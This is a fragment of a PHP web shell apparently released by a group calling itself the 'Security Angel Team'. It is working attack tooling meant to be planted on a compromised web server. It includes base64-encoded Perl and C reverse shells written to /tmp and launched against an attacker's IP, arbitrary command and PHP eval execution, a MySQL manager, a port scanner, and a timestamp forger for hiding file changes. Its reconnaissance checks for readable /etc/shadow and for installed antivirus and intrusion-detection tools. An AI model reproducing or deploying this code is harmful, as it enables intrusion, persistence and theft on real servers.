makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
p('

');
formfoot();
p('
');
p('

Upload file

');
p('

This operation the DB user must has FILE privilege

');
p('

Save path(fullpath): Choose a file: Upload

');
p('

Download file

');
p('

File: Download

');
makehide('dbhost');
makehide('dbport');
makehide('dbuser');
makehide('dbpass');
makehide('dbname');
makehide('charset');
makehide('doing');
makehide('action','sqlfile');
p('
');
}

elseif ($action == 'mysqladmin') {
!$dbhost && $dbhost = 'localhost';
!$dbuser && $dbuser = 'root';
!$dbport && $dbport = '3306';
$dbform = '';
if(isset($dbhost)){
$dbform .= "\n";
}
if(isset($dbuser)) {
$dbform .= "\n";
}
if(isset($dbpass)) {
$dbform .= "\n";
}
if(isset($dbport)) {
$dbform .= "\n";
}
if(isset($dbname)) {
$dbform .= "\n";
}
if(isset($charset)) {
$dbform .= "\n";
}

if ($doing == 'backupmysql' && $saveasfile) {
if (!$table) {
m('Please choose the table');
} else {
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$fp = @fopen($path,'w');
if ($fp) {
foreach($table as $k => $v) {
if ($v) {
sqldumptable($v, $fp);
}
}
fclose($fp);
$fileurl = str_replace(SA_ROOT,'',$path);
m('Database has success backup to '.$path.'');
mysql_close();
} else {
m('Backup failed');
}
}
}
if ($insert && $insertsql) {
$keystr = $valstr = $tmp = '';
foreach($insertsql as $key => $val) {
if ($val) {
$keystr .= $tmp.$key;
$valstr .= $tmp."'".addslashes($val)."'";
$tmp = ',';
}
}
if ($keystr && $valstr) {
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
}
}
if ($update && $insertsql && $base64) {
$valstr = $tmp = '';
foreach($insertsql as $key => $val) {
$valstr .= $tmp.$key."='".addslashes($val)."'";
$tmp = ',';
}
if ($valstr) {
$where = base64_decode($base64);
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
}
}
if ($doing == 'del' && $base64) {
$where = base64_decode($base64);
$delete_sql = "DELETE FROM $tablename WHERE $where";
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
}

if ($tablename && $doing == 'drop') {
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
if (q("DROP TABLE $tablename")) {
m('Drop table of success');
$tablename = '';
} else {
m(mysql_error());
}
}

formhead(array('title'=>'MYSQL Manager'));
makehide('action','mysqladmin');
p('

');
p('DBHost:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p(':');
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
p('DBUser:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('DBPass:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
p('DBCharset:');
makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
p('

');
formfoot();

//²Ù×÷¼Ç¼
formhead(array('name'=>'recordlist'));
makehide('doing');
makehide('action','mysqladmin');
makehide('base64');
makehide('tablename');
p($dbform);
formfoot();

//Ñ¡¶¨Êý¾Ý¿â
formhead(array('name'=>'setdbname'));
makehide('action','mysqladmin');
p($dbform);
if (!$dbname) {
makehide('dbname');
}
formfoot();

//Ñ¡¶¨±í
formhead(array('name'=>'settable'));
makehide('action','mysqladmin');
p($dbform);
makehide('tablename');
makehide('page',$page);
makehide('doing');
formfoot();

$cachetables = array();
$pagenum = 30;
$page = intval($page);
if($page) {
$start_limit = ($page - 1) * $pagenum;
} else {
$start_limit = 0;
$page = 1;
}
if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
//»ñÈ¡Êý¾Ý¿âÐÅÏ¢
$mysqlver = mysql_get_server_info();
p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

');
$highver = $mysqlver > '4.1' ? 1 : 0;

//»ñÈ¡Êý¾Ý¿â
$query = q("SHOW DATABASES");
$dbs = array();
$dbs[] = '-- Select a database --';
while($db = mysql_fetch_array($query)) {
$dbs[$db['Database']] = $db['Database'];
}
makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
$tabledb = array();
if ($dbname) {
p('

');
p('Current dababase: '.$dbname.'');
if ($tablename) {
p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]');
}
p('

');
mysql_select_db($dbname);

$getnumsql = '';
$runquery = 0;
if ($sql_query) {
$runquery = 1;
}
$allowedit = 0;
if ($tablename && !$sql_query) {
$sql_query = "SELECT * FROM $tablename";
$getnumsql = $sql_query;
$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
$allowedit = 1;
}
p('
');
p('

Run SQL query/queries on database '.$dbname.':

');
makehide('tablename', $tablename);
makehide('action','mysqladmin');
p($dbform);
p('
');
if ($tablename || ($runquery && $sql_query)) {
if ($doing == 'structure') {
$result = q("SHOW FULL COLUMNS FROM $tablename");
$rowdb = array();
while($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
p('

Structure

');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
foreach ($rowdb as $row) {
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
}
tbfoot();
$result = q("SHOW INDEX FROM $tablename");
$rowdb = array();
while($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
p('

Indexes

');
p('
FieldTypeCollationNullKeyDefaultExtraPrivilegesComment
'.$row['Field'].''.$row['Type'].''.$row['Collation'].' '.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' '.$row['Privileges'].' '.$row['Comment'].' 
');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
foreach ($rowdb as $row) {
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
}
tbfoot();
} elseif ($doing == 'insert' || $doing == 'edit') {
$result = q('SHOW COLUMNS FROM '.$tablename);
while ($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
$rs = array();
if ($doing == 'insert') {
p('

Insert new line in '.$tablename.' table »

');
} else {
p('

Update record in '.$tablename.' table »

');
$where = base64_decode($base64);
$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
$rs = mysql_fetch_array($result);
}
p('');
p($dbform);
makehide('action','mysqladmin');
makehide('tablename',$tablename);
p('
KeynameTypeUniquePackedSeq_in_indexFieldCardinalityCollationNullComment
'.$row['Key_name'].''.$row['Index_type'].''.($row['Non_unique'] ? 'No' : 'Yes').' '.($row['Packed'] === null ? 'No' : $row['Packed']).' '.$row['Seq_in_index'].''.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').' '.($row['Cardinality'] ? $row['Cardinality'] : 0).' '.$row['Collation'].' '.$row['Null'].' '.$row['Comment'].' 
');
foreach ($rowdb as $row) {
if ($rs[$row['Field']]) {
$value = htmlspecialchars($rs[$row['Field']]);
} else {
$value = '';
}
$thisbg = bg();
p('');
if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
p('');
} else {
p('');
}
}
if ($doing == 'insert') {
p('');
} else {
p('');
makehide('base64', $base64);
}
p('
'.$row['Field'].'
'.$row['Type'].'
'.$value.' 
'.$row['Field'].'
'.$row['Type'].'
');
} else {
$querys = @explode(';',$sql_query);
foreach($querys as $num=>$query) {
if ($query) {
p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

");
switch(qy($query))
{
case 0:
p('

Error : '.mysql_error().'

');
break;
case 1:
if (strtolower(substr($query,0,13)) == 'select * from') {
$allowedit = 1;
}
if ($getnumsql) {
$tatol = mysql_num_rows(q($getnumsql));
$multipage = multi($tatol, $pagenum, $page, $tablename);
}
if (!$tablename) {
$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
$tablename = $matches[1][0];
}

/*********************/
$getfield = q("SHOW COLUMNS FROM $tablename");
$rowdb = array();
$keyfied = ''; //Ö÷¼ü×Ö¶Î
while($row = @mysql_fetch_assoc($getfield)) {
$rowdb[$row['Field']]['Key'] = $row['Key'];
$rowdb[$row['Field']]['Extra'] = $row['Extra'];
if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
$keyfied = $row['Field'];
}
}
/*********************/
//Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
$query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
}

$result = q($query);

p($multipage);
p('');
p('');
if ($allowedit) p('');
$fieldnum = @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
p("");
}
p('');

while($mn = @mysql_fetch_assoc($result)){
$thisbg = bg();
p('');
$where = $tmp = $b1 = '';
//Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
foreach($mn as $key=>$inside){
if ($inside) {
//²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
$where = $key."='".addslashes($inside)."'";
break;
}
$where .= $tmp.$key."='".addslashes($inside)."'";
$tmp = ' AND ';
}
}
//¶ÁÈ¡¼Ç¼ÓÃ
foreach($mn as $key=>$inside){
$b1 .= '';
}
$where = base64_encode($where);

if ($allowedit) p('');

p($b1);
p('');
unset($b1);
}
p('');
if ($allowedit) p('');
$fieldnum = @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
p("");
}
p('');
tbfoot();
p($multipage);
break;
case 2:
$ar = mysql_affected_rows();
p('

affected rows : '.$ar.'

');
break;
}
}
}
}
} else {
$query = q("SHOW TABLE STATUS");
$table_num = $table_rows = $data_size = 0;
$tabledb = array();
while($table = mysql_fetch_array($query)) {
$data_size = $data_size + $table['Data_length'];
$table_rows = $table_rows + $table['Rows'];
$table['Data_length'] = sizecount($table['Data_length']);
$table_num++;
$tabledb[] = $table;
}
$data_size = sizecount($data_size);
unset($table);
p('
Action$name
$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
'.html_clean($inside).'  Edit | Del
Action$name
$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
');
p('');
makehide('action','mysqladmin');
p($dbform);
p('');
p('');
p('');
p('');
p('');
p('');
p('');
if ($highver) {
p('');
p('');
}
p('');
p('');
foreach ($tabledb as $key => $table) {
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
if ($highver) {
p('');
p('');
}
p('');
p('');
}
p('');
p('');
p('');
p('');
p('');
p('');
p('');
if ($highver) {
p('');
p('');
}
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');

p("");
makehide('doing','backupmysql');
formfoot();
p("
 NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
'.$table['Name'].''.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].' '.$table['Update_time'].' '.$table['Engine'].''.$table['Collation'].'Insert | Structure | Drop
NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
 Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
Save as file
");
fr($query);
}
}
}
tbfoot();
@mysql_close();
}//end mysql

elseif ($action == 'backconnect') {
!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
!$yourport && $yourport = '12345';
$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

if ($start && $yourip && $yourport && $use){
if ($use == 'perl') {
cf('/tmp/angel_bc',$back_connect);
$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
} else {
cf('/tmp/angel_bc.c',$back_connect_c);
$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/angel_bc.c');
$res = execute("/tmp/angel_bc $yourip $yourport &");
}
m("Now script try connect to $yourip port $yourport ...");
}

formhead(array('title'=>'Back Connect'));
makehide('action','backconnect');
p('

');
p('Your IP:');
makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
p('Your Port:');
makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
p('Use:');
makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
p('

');
formfoot();
}//end

elseif ($action == 'portscan') {
!$scanip && $scanip = '127.0.0.1';
!$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
formhead(array('title'=>'Port Scan'));
makehide('action','portscan');
p('

');
p('IP:');
makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
p('Port:');
makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
p('

');
formfoot();

if ($startscan) {
p('

Result »

');
p('
    ');
    foreach(explode(',', $scanport) as $port) {
    $fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1);
    if (!$fp) {
    p('
  • '.$scanip.':'.$port.' ------------------------ Close
  • ');
    } else {
    p('
  • '.$scanip.':'.$port.' ------------------------ Open
  • ');
    @fclose($fp);
    }
    }
    p('
');
}
}

elseif ($action == 'eval') {
$phpcode = trim($phpcode);
if($phpcode){
if (!preg_match('#<\?#si', $phpcode)) {
$phpcode = "";
}
eval("?".">$phpcode }
formhead(array('title'=>'Eval PHP Code'));
makehide('action','eval');
maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
p('

Get plugins

');
formfooter();
}//end eval

elseif ($action == 'editfile') {
if(file_exists($opfile)) {
$fp=@fopen($opfile,'r');
$contents=@fread($fp, filesize($opfile));
@fclose($fp);
$contents=htmlspecialchars($contents);
}
formhead(array('title'=>'Create / Edit File'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
formfooter();

goback();

}//end editfile

elseif ($action == 'newtime') {
$opfilemtime = @filemtime($opfile);
//$time = strtotime("$year-$month-$day $hour:$minute:$second");
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
formhead(array('title'=>'Clone folder/file was last modified time'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
formfooter();
formhead(array('title'=>'Set last modified'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
p('

year:');
makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
p('month:');
makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
p('day:');
makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
p('hour:');
makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
p('minute:');
makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
p('second:');
makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
p('

');
formfooter();
goback();
}//end newtime

elseif ($action == 'shell') {
if (IS_WIN && IS_COM) {
if($program && $parameter) {
$shell= new COM('Shell.Application');
$a = $shell->ShellExecute($program,$parameter);
m('Program run has '.(!$a ? 'success' : 'fail'));
}
!$program && $program = 'c:\windows\system32\cmd.exe';
!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
formhead(array('title'=>'Execute Program'));
makehide('action','shell');
makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
p('

');
makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('

');
formfoot();
}
formhead(array('title'=>'Execute Command'));
makehide('action','shell');
if (IS_WIN && IS_COM) {
$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
}
p('

');
makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('

');
formfoot();

if ($command) {
p('
');
if ($execfunc=='wscript' && IS_WIN && IS_COM) {
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w')
);
$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
if (is_resource($process)) {
fwrite($pipes[0], $command."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}
} else {
echo(execute($command));
}
p('
');
}
}//end shell

elseif ($action == 'phpenv') {
$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
!$dis_func && $dis_func = 'No';
$info = array(
1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
2 => array('Server Domain',$_SERVER['SERVER_NAME']),
3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
4 => array('Server OS',PHP_OS),
5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
8 => array('PHP run mode',strtoupper(php_sapi_name())),
9 => array('The file path',__FILE__),

10 => array('PHP Version',PHP_VERSION),
11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')),
12 => array('Safe Mode',getcfg('safe_mode')),
13 => array('Administrator',$adminmail),
14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
15 => array('enable_dl',getcfg('enable_dl')),
16 => array('display_errors',getcfg('display_errors')),
17 => array('register_globals',getcfg('register_globals')),
18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
19 => array('memory_limit',getcfg('memory_limit')),
20 => array('post_max_size',getcfg('post_max_size')),
21 => array('upload_max_filesize',$upsize),
22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
23 => array('disable_functions',$dis_func),
);

if($phpvarname) {
m($phpvarname .' : '.getcfg($phpvarname));
}

formhead(array('title'=>'Server environment'));
makehide('action','phpenv');
makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
formfooter();

$hp = array(0=> 'Server', 1=> 'PHP');
for($a=0;$a<2;$a++) {
p('

'.$hp[$a].' »

');
p('
    ');
    if ($a==0) {
    for($i=1;$i<=9;$i++) {
    p('
  • '.$info[$i][0].':'.$info[$i][1].'
  • ');
    }
    } elseif ($a == 1) {
    for($i=10;$i<=23;$i++) {
    p('
  • '.$info[$i][0].':'.$info[$i][1].'
  • ');
    }
    }
    p('
');
}
}//end phpenv

elseif ($action == 'secinfo') {

secparam('Server software', @getenv('SERVER_SOFTWARE'));
secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
secparam('Open base dir', @ini_get('open_basedir'));
secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
secparam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
secparam('Supported databases', implode(', ', $temp));

if( !IS_WIN ) {
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
secparam('OS version', @file_get_contents('/proc/version'));
secparam('Distr name', @file_get_contents('/etc/issue.net'));
$safe_mode = @ini_get('safe_mode');
if(!$GLOBALS['safe_mode']) {
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
secparam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
secparam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
secparam('Downloaders', implode(', ',$temp));
secparam('Hosts', @file_get_contents('/etc/hosts'));
secparam('HDD space', execute('df -h'));
secparam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
secparam('OS Version',execute('ver'));
secparam('Account Settings',execute('net accounts'));
secparam('User Accounts',execute('net user'));
secparam('IP Configurate',execute('ipconfig -all'));
}
}//end

else {
m('Undefined Action');
}

?>



Powered by 2011. Copyright (C) 2004-2011 Security Angel Team [S4T] All Rights Reserved.





/*======================================================
º¯Êý¿â
======================================================*/

function secparam($n, $v) {
$v = trim($v);
if($v) {
p('

'.$n.' »

');
p('
');
if(strpos($v, "\n") === false)
p($v.'
');
else
p('
'.$v.'
');
p('
');
}
}
function m($msg) {
echo '
';
echo $msg;
echo '
';
}
function scookie($key, $value, $life = 0, $prefix = 1) {
global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
$key = ($prefix ? $cookiepre : '').$key;
$life = $life ? $life : $cookielife;
$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
}
function multi($num, $perpage, $curpage, $tablename) {
$multipage = '';
if($num > $perpage) {
$page = 10;
$offset = 5;
$pages = @ceil($num / $perpage);
if($page > $pages) {
$from = 1;
$to = $pages;
} else {
$from = $curpage - $offset;
$to = $curpage + $page - $offset - 1;
if($from < 1) {
$to = $curpage + 1 - $from;
$from = 1;
if(($to - $from) < $page && ($to - $from) < $pages) {
$to = $page;
}
} elseif($to > $pages) {
$from = $curpage - $pages + $to;
$to = $pages;
if(($to - $from) < $page && ($to - $from) < $pages) {
$from = $pages - $page + 1;
}
}
}
$multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : '');
for($i = $from; $i <= $to; $i++) {
$multipage .= $i == $curpage ? $i.' ' : '['.$i.'] ';
}
$multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : '');
$multipage = $multipage ? '

Pages: '.$multipage.'

' : '';
}
return $multipage;
}
// µÇ½Èë¿Ú
function loginpage() {
?>


Password:



exit;
}//end loginpage()

function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('exec')) {
@exec($cfe,$res);
$res = jo